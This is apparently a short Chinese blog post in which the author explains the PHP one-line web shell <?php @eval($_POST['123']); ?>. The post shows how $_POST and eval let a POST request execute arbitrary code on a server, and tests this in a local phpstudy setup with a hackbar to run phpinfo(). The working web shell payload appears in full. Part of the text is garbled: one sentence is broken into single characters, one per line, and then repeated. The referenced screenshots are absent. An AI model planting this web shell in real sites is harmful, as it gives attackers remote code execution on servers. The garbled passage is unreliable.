在之前只停留在怎么使用一句话木马的层次上,但不懂原理总觉得不太踏实,今天稍微查询了一些资料,个人对一句话有了一些了解。
我们分析一下最简单的一句话木马:
<?php
@eval($_POST['123']);
?>
(能理解一句话木马也得益于最近刚好了解了一下php语音)
P
O
S
T
[
]
能
够
将
浏
览
器
的
p
o
s
t
请
求
储
存
在
字
典
里
,
_POST[]能够将浏览器的post请求储存在字典里,
POST[]能够将浏览器的post请求储存在字典里,_POST[‘123’]就是调用我们传给服务器关于‘123’的值。eval()是执行代码,@是不让式子报错。
也就是说,我们可以通过post请求向服务器传递一些奇怪的指令。
这里我用phpstudy生成一个环境:
利用maxhackbar传递参数:
然后就成功执行了phpinfo():